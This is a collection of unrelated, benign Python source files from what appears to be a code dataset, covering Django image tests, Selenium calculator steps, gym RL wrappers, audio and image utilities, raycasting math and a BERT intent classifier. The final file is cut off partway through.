self.assertEquals(img.height, 128)
img.set_crop(1,1,128,256).save()
img.render()
img.save()
self.assertEquals(img.width, 128)
self.assertEquals(img.height, 256)
def test_from_stream(self):
"""
Tests that streaming in data saves correctly, and into the correct location.
"""
# Fake loading it from a stream.
cd1 = self.get_test_image(image=None)
cf = ContentFile(file(TEST_IMAGE).read())
basename = os.path.basename(TEST_IMAGE)
cd1.image.save(basename, cf)
cd1.save()
self.assert_(settings.UPLOAD_PATH in cd1.image.path)
self.assertEquals(cd1.image.width, 897)
def test_custom_upload_to(self):
"""
Tests whether we can set a custom cropduster upload to path.
"""
tm = TestModel()
# Get the proxy image class
image_cls = tm._meta.get_field_by_name('image')[0].rel.to
image = image_cls()
# Mimic uploading img
cf = ContentFile(file(TEST_IMAGE).read())
basename = os.path.basename(TEST_IMAGE)
image.image.save(basename, cf)
image.save()
tm.image = image
tm.save()
path = datetime.datetime.now().strftime('/test/%Y/%m/%d')
self.assert_(path in tm.image.image.name)
def test_dynamic_path(self):
self.create_size_sets()
tm = TestModel2()
# Get the proxy image class
image_cls = tm._meta.get_field_by_name('image')[0].rel.to
image = image_cls()
# Mimic uploading img
cf = ContentFile(file(TEST_IMAGE).read())
basename = os.path.basename(TEST_IMAGE)
image.image.save(basename, cf)
image.save()
# Setup the children
for derived in image.add_size_set(name='Facebook'):
derived.render()
derived.save()
# Base assert
self.assert_( image.image.name.endswith( '/1/%s' % basename ),
"Path mismatch: %s, %s" % (image.image.name, basename) )
old_name = image.image.name
# Save the model
tm.image = image
tm.save()
self.assert_( image.image.name.endswith( '/2/%s' % basename ),
"Path mismatch: %s, %s" % (image.image.name, basename) )
self.assert_(os.path.isfile(tm.image.image.path), "Path %s is missing" % tm.image.image.path)
tm.slug = 'foobar'
tm.save()
self.assert_( image.image.name.endswith( '/3/foobar/%s' % basename ),
"Path mismatch: %s, %s" % (image.image.name, basename) )
# Everything should be different now...
self.assert_(os.path.isfile(tm.image.image.path), "Path %s is missing" % tm.image.image.path)
# Check that the children's retina images have moved
for image in tm.image.descendants:
if image.size.retina:
self.assert_(os.path.isfile(image.retina_path), "Retina didn't get moved!")
def test_proxy_image_convert(self):
"""
Tests that regular cropduster image saved to fields which use proxy versions.
"""
cd1 = self.get_test_image()
t = TestModel()
t.image = cd1
self.assert_(isinstance(cd1, CM.Image))
self.assertNotEquals(type(cd1), CM.Image)
self.assert_(issubclass(type(cd1), CM.Image))
try:
t.image = object()
self.fail("This shouldn't be allowed!")
except ValueError:
pass
def test_absolute_url(self):
"""
Tests whether absolute urls are created correctly.
"""
cd1 = self.get_test_image()
cd1.save()
image_basename = os.path.basename(TEST_IMAGE)
# Test without hash
image_url = cd1.get_absolute_url(False)
self.assertEquals(image_url, os.path.join(settings.STATIC_URL, cd1.image.url))
# Test with hash
image_url_hash = cd1.get_absolute_url()
self.assert_('?' in image_url_hash, "Missing timestamp hash")
last_timestamp = None
for i in xrange(2):
# Re-save to update the date_modified timestamp
cd1.save()
# Check the timestamp changed
self.assertNotEquals(last_timestamp, cd1.date_modified)
last_timestamp = cd1.date_modified
raw_url, timestamp = image_url_hash.split('?')
self.assertEquals(raw_url, image_url)
# Convert the hex back to the original
hashed_time = datetime.datetime.fromtimestamp(int(timestamp, 16))
# No microseconds on hashes, giving us a hash granularity
# of one second.
date_modified = cd1.date_modified - \
datetime.timedelta(microseconds = cd1.date_modified.microsecond)
self.assertEquals(date_modified, hashed_time)
def test_auto_transcode(self, normalize_ext=False):
"""
Tests that transcoding image formats works correctly.
"""
# Save JPEGS as GIFs
cur_transcode = getattr(settings, 'CROPDUSTER_TRANSCODE', {})
setattr(settings, 'CROPDUSTER_TRANSCODE', {'JPEG': 'GIF'})
if normalize_ext:
cur_normalize = getattr(settings, 'CROPDUSTER_NORMALIZE_EXT', False)
setattr(settings, 'CROPDUSTER_NORMALIZE_EXT', True)
cd1 = self.get_test_image()
cd1.save()
# New derived with arbitrary crop
img = cd1.new_derived_image()
img.set_crop(100,100,300,300).save()
img.render()
img.save()
try:
self.assertEquals(Image.open(img.image.path).format, 'GIF')
if normalize_ext:
self.assertEquals(os.path.splitext(img.image.path)[1], '.gif')
else:
self.assertEquals(os.path.splitext(img.image.path)[1], '.jpg')
finally:
setattr(settings, 'CROPDUSTER_TRANSCODE', {'JPEG': 'GIF'})
if normalize_ext:
setattr(settings, 'CROPDUSTER_NORMALIZE_EXT', cur_normalize)
def test_normalize_ext(self):
"""
Tests that extensions normalize correctly.
"""
self.test_auto_transcode(True)
class TestModel(models.Model):
image = CM.CropDusterField(upload_to='test/%Y/%m/%d')
image2 = CM.CropDusterField(null=True, related_name='image2')
image3 = CM.CropDusterField(to=CM.Image, null=True, related_name='image3')
class Counter(object):
counter = 0
def __call__(self, filename, instance=None):
self.counter += 1
counter = `self.counter`
if instance is None:
return '%s/%s' % (counter, filename)
return os.path.join(counter, instance.slug, filename)
class TestModel2(models.Model):
slug = ""
image = CM.CropDusterField(upload_to=Counter(),
dynamic_path=True)
if __name__ == '__main__':
unittest.main()
|
StarcoderdataPython
|
9699812
|
<reponame>mdmintz/seleniumspot
from behave import step
@step("Open the Calculator App")
def go_to_calculator(context):
context.sb.open("https://seleniumbase.io/apps/calculator")
@step("Press C")
def press_c(context):
context.sb.click("button#clear")
@step("Press (")
def press_open_paren(context):
context.sb.click('button[id="("]')
@step("Press )")
def press_close_paren(context):
context.sb.click('button[id=")"]')
@step("Press ÷")
def press_divide(context):
context.sb.click("button#divide")
@step("Press ×")
def press_multiply(context):
context.sb.click("button#multiply")
@step("Press -")
def press_subtract(context):
context.sb.click("button#subtract")
@step("Press +")
def press_add(context):
context.sb.click("button#add")
@step("Press =")
def press_equal(context):
context.sb.click("button#equal")
@step("Press 1")
def press_1(context):
context.sb.click('button[id="1"]')
@step("Press 2")
def press_2(context):
context.sb.click('button[id="2"]')
@step("Press 3")
def press_3(context):
context.sb.click('button[id="3"]')
@step("Press 4")
def press_4(context):
context.sb.click('button[id="4"]')
@step("Press 5")
def press_5(context):
context.sb.click('button[id="5"]')
@step("Press 6")
def press_6(context):
context.sb.click('button[id="6"]')
@step("Press 7")
def press_7(context):
context.sb.click('button[id="7"]')
@step("Press 8")
def press_8(context):
context.sb.click('button[id="8"]')
@step("Press 9")
def press_9(context):
context.sb.click('button[id="9"]')
@step("Press 0")
def press_0(context):
context.sb.click('button[id="0"]')
@step("Press ←")
def press_delete(context):
context.sb.click("button#delete")
@step("Press .")
def press_dot(context):
context.sb.click('button[id="."]')
@step("Press [{number}]")
def enter_number_into_calc(context, number):
sb = context.sb
for digit in number:
sb.click('button[id="%s"]' % digit)
@step("Evaluate [{equation}]")
def evaluate_equation(context, equation):
sb = context.sb
for key in equation:
if key == " ":
continue
elif key == "÷":
sb.click("button#divide")
elif key == "×":
sb.click("button#multiply")
elif key == "-":
sb.click("button#subtract")
elif key == "+":
sb.click("button#add")
else:
sb.click('button[id="%s"]' % key)
sb.click("button#equal")
@step('Verify output is "{output}"')
def verify_output(context, output):
sb = context.sb
sb.assert_exact_text(output, "#output")
@step("Save calculator screenshot to logs")
def save_calculator_screenshot_to_logs(context):
sb = context.sb
sb.save_screenshot_to_logs()
|
StarcoderdataPython
|
6462342
|
from math import *
#Primero, pedimos la temperatura original del huevo.
t0 = float(raw_input("Ingrese la temperatura original del huevo: "))
#Ahora, establezcamos los datos.
M = 63 #Masa. Asumiremos un huevo grande
c = 3.7 #Capacidad calorifica especifica
ro = 1.038 #Densidad
K = 0.0054 #Conductividad termica
tw = 100 #Temperatura de ebullicion del agua
ty = 70 #Temperatura final
#Ahora, calculamos el tiempo necesario para llegar a la temperatura final
t = ( (M**(2/3) * c * ro**(1/3)) / (K * pi**2 * ((4 * pi)/3)**(2/3) ) * log( 0.76 * ((t0 - tw)/(ty - tw)) ))
print "El tiempo necesario es "+str(t)+" s"
|
StarcoderdataPython
|
8080876
|
import matplotlib.pyplot as plt
import gym
import time
from csv import writer
from stable_baselines3.common.type_aliases import GymObs, GymStepReturn
from typing import Union
import numpy as np
import os
from typing import Optional
from autoencoder import load_ae
import gym.wrappers
class AutoEncoderWrapper(gym.Wrapper):
def __init__(self, env, ae_path):
super().__init__(env)
self.env = env
assert ae_path is not None
self.ae = load_ae(ae_path)
self.observation_space = gym.spaces.Box(low=-np.inf, high=np.inf, shape=(self.ae.z_size,), dtype=np.float32)
def reset(self):
return self.ae.encode_from_raw_image(self.env.reset()[:, :, ::-1]).flatten()
def step(self, action):
obs, reward, done, infos = self.env.step(action)
return self.ae.encode_from_raw_image(obs[:, :, ::-1]).flatten(), reward, done, infos
class AutoEncoderHistoryWrapper(gym.Wrapper):
def __init__(self, env: gym.Env, ae_path, num_history=10, max_throttle=1.0, min_throtthle=0.0, left_steering=-1.0, right_steering=1.0) -> None:
super().__init__(env)
self.env = env
self.ae = load_ae(ae_path)
self.max_throttle = max_throttle
self.min_throttle = min_throtthle
self.left_sterring = left_steering
self.right_steering = right_steering
self.num_command = 2
self.steering_diff = 0.15-1e-5
self.num_history = num_history
self.history = np.zeros((1, self.num_command*self.num_history), dtype=np.float32)
self.action_space = gym.spaces.Box(
low=np.array([np.float32(self.left_sterring), np.float32(self.min_throttle)]),
high=np.array([np.float32(self.right_steering), np.float32(self.max_throttle)]),
dtype=np.float32
)
self.observation_space = gym.spaces.Box(
low=np.finfo(np.float32).min,
high=np.finfo(np.float32).max,
shape=(1,self.ae.z_size + self.num_command*self.num_history),
dtype=np.float32
)
def reset(self, **kwargs) -> GymObs:
obs = self.ae.encode_from_raw_image(self.env.reset()[:, :, ::-1]).flatten()
obs = np.reshape(obs, (1, self.ae.z_size))
self.history = np.zeros((1, self.num_command*self.num_history), dtype=np.float32)
observation = np.concatenate((obs, self.history), axis=-1)
return observation
def step(self, action: Union[np.ndarray, int]) -> GymStepReturn:
# last_steering = self.history[0, -2]
# diff = np.clip(action[0] - last_steering, -self.steering_diff, self.steering_diff)
# #print(f"pred {action[0]} - last {last_steering} - now {last_steering + diff}")
# action[0] = last_steering + diff
self.history = np.roll(self.history, shift=-self.num_command, axis=-1)
self.history[..., -self.num_command:] = action
obs, reward, done, info = self.env.step(action)
obs = self.ae.encode_from_raw_image(obs[:, :, ::-1]).flatten()
obs = np.reshape(obs, (1, self.ae.z_size))
# if action[1] == 0.0:
# action[1] = 0.1
#prev_steering = self.history[0, -1]
# # print("prev_steer", prev_steering)
# # print("now steer", action[0])
#diff = np.clip(action[0]- prev_steering, -self.steering_diff, self.steering_diff)
# # print("diff: ",diff)
#action[0] = prev_steering + diff
# # print("NEW steer", action[0], "\n")
observation = np.concatenate((obs, self.history), axis=-1)
return observation, self.new_reward(reward), done, info
def new_reward(self, reward):
steering = self.history[0, 1*-self.num_command]
last_steering = self.history[0, 2*-self.num_command]
# print(f"Original reward: {reward} steer {steering} last_steer {last_steering} ")
angle_diff = abs(steering - last_steering)
penalization = 0
if angle_diff > 0.15:
penalization = 2*angle_diff
if reward < 0:
for i in range(len(self.history)):
if self.history[0, i * -self.num_command] >= 0.001:
reward = -20 * self.history[0, i * -self.num_command]
break
if reward > 0 and penalization > 0:
reward = 0
# print(f" penalize: {penalization} ang_dif {angle_diff}")
reward -= penalization
return reward
from threading import Event, Thread
# class DonkeyViewWrapper(gym.ObservationWrapper):
# import pygame
# def __init__(self, env, path_ae):
# gym.ObservationWrapper.__init__(self, env)
# self.env = env
# self.ae = load_ae(path_ae)
# self.display_width = 640
# self.display_height = 320
# self.game_display = None
# self.raw_observation = None
# self.decoded_surface = None
# self.BLACK = (0, 0, 0)
# self.WHITE = (255, 255, 255)
# self.YELLOW = (255, 255, 0)
# self.BLUE = (0, 0, 255)
# self.reconstructed_image = None
# self.ae_observation = None
# self.game_over = False
# self.start_process()
# def main_loop(self):
# pygame.init()
# self.game_display = pygame.display.set_mode((self.display_width, self.display_height))
# pygame.display.set_caption('Agent View')
# clock = pygame.time.Clock()
# self.game_display.fill(self.WHITE)
# while not self.game_over:
# self.upateScreen()
# clock.tick(30)
# def start_process(self):
# """Start main loop process."""
# self.process = Thread(target=self.main_loop)
# self.process.daemon = True
# self.process.start()
# def pilImageToSurface(self, pilImage):
# pilImage = pilImage.resize((640, 320))
# return pygame.image.fromstring(
# pilImage.tobytes(), pilImage.size, pilImage.mode).convert()
# def upateScreen(self):
# self.game_display.fill((0, 0, 0))
# if self.reconstructed_image is not None:
# pygame_surface = self.pilImageToSurface(self.reconstructed_image)
# self.game_display.blit(pygame_surface, pygame_surface.get_rect(center=(320, 160)))
# pygame.display.update()
# def observation(self, observation):
# # logger.info(observation.shape)
# vae_dim = self.ae.z_size
# self.ae_observation = observation.copy()
# encoded = self.ae_observation.reshape(1, self.ae.z_size)
# # encoded = self.ae_observation[:, :vae_dim]
# self.reconstructed_image = self.ae.decode(encoded)
# self.reconstructed_image = np.reshape(self.reconstructed_image, (80,160,3))
# plt.imshow(self.reconstructed_image)
# plt.show()
# return observation
class SteeringSmoothWrapper(gym.RewardWrapper):
def __init__(self, env: gym.Env) -> None:
super().__init__(env)
self.last_steering = 0.0
self.speed = 0.0
self.throttle = 0.0
# self.velocities = np.ones((1, 10), dtype=np.float32)
def reset(self, **kwargs):
self.last_steering = 0.0
self.hrottle = 0.0
self.speed = 0.0
return self.env.reset(**kwargs)
def step(self, action):
observation, reward, done, info = self.env.step(action)
self.speed = info["speed"]
return observation, self.reward(reward, action), done, info
def reward(self, reward, action):
angle = action[0]
self.throttle = action[1]
angle_diff = abs(angle - self.last_steering)
self.last_steering = angle
contrib_throttle = 0
if reward > 0:
if self.throttle >=0.3 and self.throttle<=0.6:
contrib_throttle = self.throttle*4
elif self.throttle < 0.1:
contrib_throttle = -1
if angle_diff > 0.15:
reward_return = reward + contrib_throttle + self.speed - (3*angle_diff)
# print(f"PEN reward: {reward_return} - rew {reward} cont_thr {contrib_throttle} th{self.throttle}")
return reward_return
reward_return = (reward + contrib_throttle + self.speed)
# print(f"PRO reward: {reward_return} - rew {reward} cont_thr {contrib_throttle} th{self.throttle} speed {self.speed}")
return reward_return
return reward
class ActionClipWrapper(gym.ActionWrapper):
def __init__(self, env: gym.Env) -> None:
super().__init__(env)
self.last_steering = 0.0
def action(self, action):
diff = np.clip(action[0] - self.last_steering, -0.15, 0.15)
#print(f"pred {action[0]} - last {last_steering} - now {last_steering + diff}")
action[0] = self.last_steering + diff
#steering = (.4*action[0])+(.6*self.last_steering)
# print(f"CLIP ACTION: new {steering} old {action[0]} prec {self.last_steering}")
#action[0] = steering
self.last_steering = action[0]
return action
class MyMonitor(gym.Wrapper):
def __init__(self, env: gym.Env, log_dir, name_model) -> None:
super().__init__(env)
self.env = env
self.file = open(os.path.join(str(log_dir), name_model+"_metric.csv"), "w+")
self.log = writer(self.file)
self.log.writerow(['Episode', 'Timestep', 'Avg Steer', 'Min Reward',
'Avg Reward', 'Max Reward', 'Reward Sum', 'Episode Length (timestep)',
'Episode Time','Avg Speed', 'Max Speed', 'Min CTE', 'Avg CTE', 'Max CTE',
'Distance',"Average Throttle", "Max Throttle", "Min Throttle",
"Average Absolute CTE", "Min Absolute CTE", "Max Absolute CTE", "Hit",
"Num lap","Avg time lap", "Best time lap", ])
self.episode = 0
self.time_step = 0
def reset(self, **kwargs) -> GymObs:
self.start_episode = time.time()
self.episode_len = 0
self.steers = []
self.throttles = []
self.rewards = []
self.velocities = []
self.ctes = []
self.ctes_absolute = []
self.distance = 0.0
self.distance_time = self.start_episode
self.episode +=1
self.num_lap = 0
self.laps_time = []
self.hit = 0
return self.env.reset(**kwargs)
def step(self, action: Union[np.ndarray, int]) -> GymStepReturn:
observation, reward, done, info = self.env.step(action)
self.time_step += 1
self.steers.append(action[0])
self.throttles.append(action[1])
self.velocities.append(round(info["speed"], 4))
self.rewards.append(round(reward, 4))
self.ctes.append(round(info["cte"], 4))
self.ctes_absolute.append(round(abs(info["cte"]), 4))
self.distance += info["speed"] * (time.time() - self.distance_time)
self.distance_time = time.time()
self.episode_len += 1
self.num_lap = info["num_lap"]
if info["time_last_lap"] > 0:
self.laps_time.append(info["time_last_lap"])
if info["hit"] != "none":
self.hit += 1
if done:
unique_time_laps = []
avg_time_lap = 0.0
best_time_lap = 0.0
if self.num_lap > 0:
unique_time_laps.append(np.unique(self.laps_time))
avg_time_lap = np.mean(unique_time_laps)
best_time_lap = np.min(unique_time_laps)
print("FINISH EPISODE:", self.episode, f"(timestep: {self.time_step})" , " timestep ep: ", round(self.episode_len, 4), " sum reward:",
round(np.sum(self.rewards), 4), " avg reward:", round(np.mean(self.rewards), 4), " tot dist:", round(self.distance, 4),
"avg throt:", round(np.mean(self.throttles), 4), "num laps: ", info["num_lap"])
self.log.writerow([self.episode, self.time_step, round(np.mean(self.steers), 4), round(np.min(self.rewards), 4),
round(np.mean(self.rewards), 4), round(np.max(self.rewards), 4), round(np.sum(self.rewards), 4),
self.episode_len, round((time.time() - self.start_episode), 4),
round(np.mean(self.velocities), 4), round(np.max(self.velocities), 4),
round(np.min(self.ctes), 4), round(np.mean(self.ctes), 4),
round(np.max(self.ctes), 4), round(self.distance, 4), round(
np.mean(self.throttles), 4), round(np.max(self.throttles), 4),
round(np.min(self.throttles), 4), round(np.mean(self.ctes_absolute), 4),
round(np.min(self.ctes_absolute), 4), round(np.max(self.ctes_absolute), 4),
self.hit, round(avg_time_lap, 6), round(best_time_lap, 6) ])
return observation, reward, done, info
def close(self) -> None:
"""
Closes the environment
"""
super(MyMonitor, self).close()
self.file.flush()
def get_total_steps(self) -> int:
"""
Returns the total number of timesteps
"""
return self.time_step
class NormalizeObservation(gym.Wrapper):
def __init__(self, env: gym.Env) -> None:
super().__init__(env)
self.env = env
def reset(self) -> GymObs:
obs = self.env.reset()
obs = obs.astype(np.float16)
obs /= 255.0
return obs
def step(self, action) -> GymStepReturn:
observation, reward, done, info = self.env.step(action)
observation = observation.astype(np.float32)
observation /= 255.0
return observation, reward, done, info
|
StarcoderdataPython
|
120908
|
#!/usr/bin/python3
#
# Copyright © 2017 jared <<EMAIL>>
#
from pydub import AudioSegment, scipy_effects, effects
import os
import settings, util
# combine two audio samples with a crossfade
def combine_samples(acc, file2, CROSSFADE_DUR=100):
util.debug_print('combining ' + file2)
sample2 = AudioSegment.from_wav(file2)
output = acc.append(sample2, crossfade=CROSSFADE_DUR)
output = effects.normalize(output)
return output
# combine audio samples with crossfade, from within program
def combine_prog_samples(acc, nsamp, CROSSFADE_DUR=100):
output = acc.append(nsamp, crossfade=CROSSFADE_DUR)
return output
# split an audio file into low, mid, high bands
def split_file(fname):
curr_file = AudioSegment.from_file(fname)
low_seg = scipy_effects.low_pass_filter(curr_file, settings.LOW_FREQUENCY_LIM).export(fname + '_low.wav', 'wav')
mid_seg = scipy_effects.band_pass_filter(curr_file, settings.LOW_FREQUENCY_LIM, settings.HIGH_FREQUENCY_LIM).export(fname + '_mid.wav', 'wav')
high_seg = scipy_effects.high_pass_filter(curr_file, settings.HIGH_FREQUENCY_LIM).export(fname + '_high.wav', 'wav')
## add a sample to an existing wav
#def add_sample(fname, samplefile, CROSSFADE_DUR=100):
# new_file = combine_samples(fname, samplefile, CROSSFADE_DUR)[0]
# os.rename(fname, 'old_' + fname)
# os.rename(new_file, fname)
# return new_file[1]
|
StarcoderdataPython
|
3338597
|
<reponame>risteon/nimble
from __future__ import print_function
import sys
from nimble.sources import KittiOdometrySource
from nimble.sinks import ImageDisplaySink
def main():
if len(sys.argv) < 2:
print("Specify the Kitti dataset root folder as argument")
return
kitti_data = KittiOdometrySource(sys.argv[1], 3)
kitti_data.advance()
kitti_data.seek(42) # only for seekable sources
data, label = kitti_data.get_data()
# print transform matrix
print("Transform: ")
print(label)
# show image
display = ImageDisplaySink()
display.set_data(data)
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
5008070
|
import os
import argparse
from shutil import move
import cv2
import shutil
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--inputdir", help="full directory path which hold images/data", type=str)
args = parser.parse_args()
new_dir = os.path.join (os.path.dirname(args.inputdir), "resized_selected_images")
if not os.path.isdir(new_dir):
os.mkdir(new_dir)
for filename in os.listdir(args.inputdir):
file_path = os.path.join(args.inputdir, filename)
new_file_path = os.path.join(new_dir, filename)
image = cv2.imread(file_path)
if image.shape[0] <=400 or image.shape[1] <= 400:
resized = image
else:
r = 400.0 / image.shape[1]
dim = (400, int(image.shape[0] * r))
resized = cv2.resize(image, dim, interpolation = cv2.INTER_AREA)
cv2.imwrite(new_file_path, resized)
'''
cv2.imshow("resized", resized)
k = cv2.waitKey(0)
if k == 27:
cv2.destroyAllWindows()
break
'''
|
StarcoderdataPython
|
9638461
|
"""This module contains a type to store calculate distances between the player and walls/objects"""
from pygame.math import Vector2
import settings
from side import Side
class Plotter:
"""This type calculates sizes, distances and directions of in game objects in relation to the player"""
def _avoid_zero(self, value):
"""use this function to avoid zero if we risk a divide by zero expression."""
if value == 0:
return 0.000001
else:
return value
def get_object_size_based_on_distance(self, distance):
"""Returns a value between 1 (100%) and 0 (0%) describing how much of the vertical screen an object
should consume based on its distance from the player"""
size = int(settings.SCREEN_HEIGHT /
self._avoid_zero(distance))
return size
def get_distance_to_side(self, player_pos, map_pos, ray_direction, distance_delta):
"""get length of ray from current position to next x or y-side"""
# subtract current map square x cord from the total ray x to get the difference/distance in x from the ray origin to the left wall,
# as if we are moving right the rayPosition.x will be the greater value and we want an absolute/non negative value for the difference.
# this is the same as the ratio of how far the ray position is across the map grid square in x, 0 = 0% and 1 = 100%.
# OR subtract ray.x from the NEXT square's X co-ordinate to get the difference/distance in x from the ray origin to the right wall,
# as if we are moving right the map x + 1 will be the greater value and we want an absolute/non negative value for the difference.
# this is the same as the ratio of how far the ray position is across the next map grid square in x, 0 = 0% and 1 = 100%.
x_ratio = (
player_pos.x - map_pos.x) if ray_direction.x < 0 else (map_pos.x + 1 - player_pos.x)
y_ratio = (
player_pos.y - map_pos.y) if ray_direction.y < 0 else (map_pos.y + 1 - player_pos.y)
# multiply distance_delta by this ratio to get the true distance we need to go in the direction of the ray to hit the wall.
distance_to_side = Vector2()
distance_to_side.x = distance_delta.x * x_ratio
distance_to_side.y = distance_delta.y * y_ratio
return distance_to_side
def get_ray_direction(self, x, player):
"""get a vector that represents the direction a ray travels from the player
through the screen/camera plane at horizontal position / pixel column x"""
# what percentage of the screen with is the current x value.
x_ratio = x / settings.SCREEN_WIDTH
# x-coordinate along camera plane, from -1 through 0 and on to 1
camera_x = (2 * x_ratio) - 1
# The current ray is the sum of the player direction and the x-coordinate along camera plane
return player.direction + player.camera_plane * camera_x
def get_distance_delta(self, ray_direction):
"""length of ray from one x or y-side to next x or y-side"""
# see https://gamedev.stackexchange.com/q/45013 for a better explanation.
# calculate how the ratios of 1 to the x and y components
# that is what number do you need to multiply x or y by to turn them into 1.
x_ratio = 1 / self._avoid_zero(ray_direction.x)
y_ratio = 1 / self._avoid_zero(ray_direction.y)
# create vectors for where x/y has length 1 using these multipliers.
scaled_x = ray_direction * x_ratio
scaled_y = ray_direction * y_ratio
# the length of these vectors represent how far the ray has to travel to move one unit in x or one unit in y.
# Remember, we can get the length of a vector with the Pythagorean theorem.
# a*a + b*b = c*c OR
# x*x + y*y = length * length SO
# length = sqrt(x*x + y*y)
distance_delta = Vector2()
distance_delta.x = scaled_x.length()
distance_delta.y = scaled_y.length()
return distance_delta
def get_wall_x_across_percentage(self, side, player_pos, ray_direction, perceptual_wall_distance):
"""get where exactly a wall was hit in terms of a value between 0 and 1."""
distance_ray_has_travelled_in_one_axis = 0
# if we had hit a left or right side, we need to know how far in y the ray has travelled
# from the player.
if (side == Side.LeftOrRight):
distance_ray_has_travelled_in_one_axis = player_pos.y + \
(perceptual_wall_distance * ray_direction.y)
# if we have hit a top or bottom side, we need to know how far in x the ray has travelled
# from the player
else:
distance_ray_has_travelled_in_one_axis = player_pos.x + \
perceptual_wall_distance * ray_direction.x
# we only want a measure of how far across the wall we have hit as a
# percentage, so we use the modulo operator to get rid of
# the whole part of the number. This would make 10.77 into 0.77
return distance_ray_has_travelled_in_one_axis % 1
def get_perceptual_wall_distance(self, side, player, map_pos, step, ray_direction):
"""Calculate distance projected on camera direction (oblique distance will give fisheye effect!)"""
if side == Side.LeftOrRight:
# this difference is how far the ray has travelled in x before hitting a side wall.
distance_in_x = map_pos.x - player.position.x
# if step = 1/positive x/right, make this 0. if step = -1/negative x/left make it 1.
one_or_zero = (1 - step.x) / 2
perceptual_wall_distance = (
distance_in_x + one_or_zero) / ray_direction.x
else:
# this difference is how far the ray has travelled in y before hitting a wall.
distance_in_y = map_pos.y - player.position.y
# if step = 1/positive y/up, make this 0. if step = -1/negative y/down make it 1.
one_or_zero = (1 - step.y) / 2
perceptual_wall_distance = (
distance_in_y + one_or_zero) / ray_direction.y
perceptual_wall_distance = self._avoid_zero(
perceptual_wall_distance)
return perceptual_wall_distance
|
StarcoderdataPython
|
1621301
|
<filename>src/xbot/nlu/intent/intent_with_bert.py
import os
import json
from typing import Any
from src.xbot.util.nlu_util import NLU
from src.xbot.constants import DEFAULT_MODEL_PATH
from src.xbot.util.path import get_root_path, get_config_path, get_data_path
from src.xbot.util.download import download_from_url
from data.crosswoz.data_process.nlu_intent_dataloader import Dataloader
from data.crosswoz.data_process.nlu_intent_postprocess import recover_intent
import torch
from torch import nn
from transformers import BertModel
# def recover_intent_predict(dataloader, intent_logits):
# das = []
#
# max_index = torch.argsort(intent_logits, descending=True).numpy()
# for j in max_index[0:5]:
# intent, domain, slot, value = re.split(r'\+', dataloader.id2intent[j])
# das.append([intent, domain, slot, value])
# return das
class IntentWithBert(nn.Module):
"""Intent Classification with Bert"""
def _forward_unimplemented(self, *input: Any) -> None:
pass
def __init__(self, model_config, device, intent_dim, intent_weight=None):
super(IntentWithBert, self).__init__()
# count of intent
self.intent_num_labels = intent_dim
# init intent weight
self.intent_weight = (
intent_weight
if intent_weight is not None
else torch.tensor([1.0] * intent_dim)
)
# gpu
self.device = device
# load pretrain model from model hub
self.bert = BertModel.from_pretrained(model_config["pretrained_weights"])
self.dropout = nn.Dropout(model_config["dropout"])
self.finetune = model_config["finetune"]
self.hidden_units = model_config["hidden_units"]
if self.hidden_units > 0:
self.intent_hidden = nn.Linear(
self.bert.config.hidden_size, self.hidden_units
)
self.intent_classifier = nn.Linear(
self.hidden_units, self.intent_num_labels
)
nn.init.xavier_uniform_(self.intent_hidden.weight)
else:
self.intent_classifier = nn.Linear(
self.bert.config.hidden_size, self.intent_num_labels
)
nn.init.xavier_uniform_(self.intent_classifier.weight)
# Binary Cross Entropy
self.intent_loss_fct = torch.nn.BCEWithLogitsLoss(pos_weight=self.intent_weight)
def forward(self, word_seq_tensor, word_mask_tensor, intent_tensor=None):
if not self.finetune:
self.bert.eval()
with torch.no_grad(): # torch.no_grad() 是一个上下文管理器,被该语句 wrap 起来的部分将不会track 梯度。
outputs = self.bert(
input_ids=word_seq_tensor, attention_mask=word_mask_tensor
)
else: # 更新参数
outputs = self.bert(
input_ids=word_seq_tensor, attention_mask=word_mask_tensor
)
pooled_output = outputs[1]
if self.hidden_units > 0:
pooled_output = nn.functional.relu(
self.intent_hidden(self.dropout(pooled_output))
)
pooled_output = self.dropout(pooled_output)
intent_logits = self.intent_classifier(pooled_output)
intent_loss = None
if intent_tensor is not None:
intent_loss = self.intent_loss_fct(intent_logits, intent_tensor)
return intent_logits, intent_loss
class IntentWithBertPredictor(NLU):
"""NLU Intent Classification with Bert 预测器"""
default_model_config = "nlu/crosswoz_all_context_nlu_intent.json"
default_model_name = "pytorch-intent-with-bert_policy.pt"
default_model_url = (
"http://qiw2jpwfc.hn-bkt.clouddn.com/pytorch-intent-with-bert.pt"
)
def __init__(self):
# path
root_path = get_root_path()
config_file = os.path.join(
get_config_path(), IntentWithBertPredictor.default_model_config
)
# load config
config = json.load(open(config_file))
self.device = config["DEVICE"]
# load intent vocabulary and dataloader
intent_vocab = json.load(
open(
os.path.join(
get_data_path(), "crosswoz/nlu_intent_data/intent_vocab.json"
),
encoding="utf-8",
)
)
dataloader = Dataloader(
intent_vocab=intent_vocab,
pretrained_weights=config["model"]["pretrained_weights"],
)
# load best model
best_model_path = os.path.join(
os.path.join(root_path, DEFAULT_MODEL_PATH),
IntentWithBertPredictor.default_model_name,
)
# best_model_path = os.path.join(DEFAULT_MODEL_PATH, IntentWithBertPredictor.default_model_name)
if not os.path.exists(best_model_path):
download_from_url(
IntentWithBertPredictor.default_model_url, best_model_path
)
model = IntentWithBert(config["model"], self.device, dataloader.intent_dim)
model.load_state_dict(torch.load(best_model_path, map_location=self.device))
model.to(self.device)
model.eval()
self.model = model
self.dataloader = dataloader
print(f"{best_model_path} loaded - {best_model_path}")
def predict(self, utterance, context=list()):
# utterance
ori_word_seq = self.dataloader.tokenizer.tokenize(utterance)
# tag
# ori_tag_seq = ['O'] * len(ori_word_seq)
intents = []
word_seq, new2ori = ori_word_seq, None
batch_data = [
[ori_word_seq, intents, word_seq, self.dataloader.seq_intent2id(intents)]
]
pad_batch = self.dataloader.pad_batch(batch_data)
pad_batch = tuple(t.to(self.device) for t in pad_batch)
word_seq_tensor, word_mask_tensor, intent_tensor = pad_batch
# inference
intent_logits, _ = self.model(word_seq_tensor, word_mask_tensor)
# postprocess
intent = recover_intent(self.dataloader, intent_logits[0])
return intent
if __name__ == "__main__":
nlu = IntentWithBertPredictor()
print(nlu.predict("北京布提克精品酒店酒店是什么类型,有健身房吗?"))
|
StarcoderdataPython
|
4970387
|
<reponame>stcz/qfieldcloud<filename>docker-app/qfieldcloud/core/utils2/jobs.py
import logging
from typing import List, Optional
import qfieldcloud.core.models as models
from django.db.models import Q
from qfieldcloud.core import exceptions
logger = logging.getLogger(__name__)
def apply_deltas(
project: "models.Project",
